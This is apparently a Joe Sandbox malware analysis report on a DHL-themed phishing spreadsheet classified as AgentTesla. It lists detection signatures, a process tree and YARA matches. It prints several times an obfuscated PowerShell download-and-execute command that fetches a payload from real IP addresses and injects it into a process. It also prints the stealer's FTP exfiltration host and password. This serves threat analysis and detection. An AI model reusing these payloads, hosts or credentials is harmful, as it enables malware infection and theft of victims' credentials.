Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx

Overview

General Information

Sample name:DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx
Analysis ID:1467966
MD5:e991e2f82fe86b23ae342b296a5b212d
SHA1:65cde8d0909a4646746db6fa4675559cd73b309a
SHA256:521e56cecd5dd355d23dcf9085f29499dc4580835a69222a13214873971e2dce
Tags:DHLxlamxlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2948 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 1444 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 380 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 1904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'+'TF8.GetString(oiLdown'+'loadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ol'+'s<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLs'+'tartIndex -ge 0 -and oiLendIndex -gt oiLstartIn'+'dex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - o'+'iLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartInd'+'ex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64St'+'ring(oiLbase64Command); oiLl'+'oadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRu'+'nPE.HomeO'+'ls); oiLmet'+'hod = oiLtype.GetMethod(Ol'+'sVA'+'IOls).Invoke(oi'+'Lnull, [object[]'+'] (Olstxt.4446'+'sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.137/imge/new-image_'+'j.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try { o'+'iLdownloadedData = oiLwebClient.Down'+'loadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlin'+'kOls -F'+'oregroundColor Red; exit }; if (oiLdownloadedData '+'-ne oiLnull) { oiLimageText = [System.Text.Encoding]::UT'+'F8.GetString(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLsta'+'rtIndex += oiLstartFlag.Leng'+'th; oiLbase64Length'+' = oiLendIndex - oiLstartIndex; oiLbase64Command = o'+'iLimageText.Substring(oiLstartIndex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String'+'(oiLbas'+'e64'+'Command)'+'; oiLloadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE'+'.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls , Ol'+'sdesat'+'ivadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsdesativadoOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try { oiLdownloadedData'+' = oiLwebClient.DownloadData'+'(oi'+'Llink) } catch { Wri'+'te-Host OlsFailed'+' To download data from oiLlinkOls -ForegroundCol'+'or Red; exit }; if ('+'oiLdownloadedData -ne oiLnull) { oiLimageText = [System.Text.Encoding]::UTF8.GetString'+'(oiLdownloadedD'+'ata); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oi'+'LstartFlag); oiLendIndex = oiLimageText.I'+'ndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLst'+'ar'+'tFlag.Le'+'ngt'+'h; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command = oi'+'LimageText'+'.Substring(oiLstar'+'tIndex, oi'+'Lbase64Length)'+'; '+'oi'+'LcommandBytes = [System.Conv'+'e'+'rt'+']::FromBase64String(oiLbase64Command); oiLloadedA'+'ssembly = [System.Ref'+'lection.Assembly]::Load(oiLcommandBytes); oiLtyp'+'e = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]] (Olstxt.4446sa'+'bbbbbbbe'+'wmadam/441.871'+'.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,Ols'+'AddInProcess32Ols,OlsO'+'ls)) } }Set Scriptblock oiLlink = Olshttp://91.92'+'.254.'+'19'+'4/imge/new-image_v.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try {'+' oiLdow'+'nloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host '+'OlsFailed To download data from oiLlink'+'Ols -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = ['+'System.Text.Encoding]::UTF8.GetString(oiLd'+'ownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiL'+'endFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag);'+' if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLstar'+'tFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartIndex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLload'+'ed'+'Assembly = [System.Reflection.Assembly]::Load'+'(oiLcommandBytes); oiLt'+'ype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLty'+'pe.GetMethod(OlsV'+'AIOls).Invoke(oiLnull, [object[]] (Olstxt.56esaberiflortnoc/441.871.64.891//:pt'+'thOls , Ol'+'sdesativadoOls , '+'OlsdesativadoOls , Olsdesativa'+'doOls,OlsAddInProcess32Ols,OlsOls)) } }').RePlAcE('Ols',[sTrInG][ChaR]39).RePlAcE(([ChaR]111+[ChaR]105+[ChaR]76),[sTrInG][ChaR]36) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • AddInProcess32.exe (PID: 3100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 3108 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 3200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 3276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 3352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 3436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
    • AddInProcess32.exe (PID: 1444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x27b:$s1: <legacyDrawing r:id="
  • 0x2a3:$s2: <oleObject progId="
  • 0x2e8:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.485482053.00000000022B5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34429:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3449b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34525:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x345b7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x34621:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x34693:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34729:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x347b9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  8.2.AddInProcess32.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x31623:$s2: GetPrivateProfileString
                  • 0x30cdb:$s3: get_OSFullName
                  • 0x3234c:$s5: remove_Key
                  • 0x324e3:$s5: remove_Key
                  • 0x3347a:$s6: FtpWebRequest
                  • 0x3440b:$s7: logins
                  • 0x3497d:$s7: logins
                  • 0x376f6:$s7: logins
                  • 0x37740:$s7: logins
                  • 0x39095:$s7: logins
                  • 0x382da:$s9: 1.85 (Hash, version 2, native byte-order)
                  Click to see the 11 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.178.144, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1444, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1444, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\controlfiredatinloverforxlammfile[1].vbs

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1444, Protocol: tcp, SourceIp: 198.46.178.144, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = 